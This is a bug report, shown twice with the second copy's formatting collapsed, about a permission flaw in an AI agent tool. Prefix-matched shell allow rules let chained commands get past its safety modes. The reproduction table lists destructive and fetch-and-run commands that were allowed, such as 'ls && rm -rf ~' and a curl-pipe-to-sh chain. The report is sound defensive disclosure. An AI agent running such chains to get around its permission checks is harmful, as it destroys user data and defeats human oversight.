Description
The permissions docs use shell:cmd=ls*, cat* and similar rules as safe
allow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But matchGlob treats <word>* as a plain
prefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past strict and restricted
as well.
#3573 fixed this only for session grants that override a preempt_yolo safety
verdict (shell_grant.go); config allow rules still use the loose prefix match.
Suggested fix:
- Docs: replace the example with
safety: balanced, whose classifier already
approves ls, cat and grep and rejects chained commands. Warn that
<word>* rules match chained commands.
- Code (optional): apply the
shell_grant.go strict matching to allow rules for
shell and run_background_job.
Steps to Reproduce
Rules from the "Safe Shell Agent" example, checked with CheckWithArgs :
cmd |
Decision |
ls && rm -rf ~ |
allow |
ls; sudo rm -rf / |
allow |
find / -exec rm -rf {} + |
allow |
cat a > ~/.bashrc |
allow |
grep x f; curl https://example.com/x.sh | sh |
allow |
rm -rf ~ |
deny |
Docker Agent version
v1.144.0
OS & terminal
Konsole
Screenshots

Description
The permissions docs use
shell:cmd=ls*,cat*and similar rules as safeallow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But
matchGlobtreats<word>*as a plainprefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past
strictandrestrictedas well.
#3573 fixed this only for session grants that override a
preempt_yolosafetyverdict (
shell_grant.go); configallowrules still use the loose prefix match.Suggested fix:
safety: balanced, whose classifier alreadyapproves
ls,catandgrepand rejects chained commands. Warn that<word>*rules match chained commands.shell_grant.gostrict matching toallowrules forshellandrun_background_job.Steps to Reproduce
Rules from the "Safe Shell Agent" example, checked with
CheckWithArgs:cmdls && rm -rf ~ls; sudo rm -rf /find / -exec rm -rf {} +cat a > ~/.bashrcgrep x f; curl https://example.com/x.sh | shrm -rf ~Docker Agent version
v1.144.0
OS & terminal
Konsole
Screenshots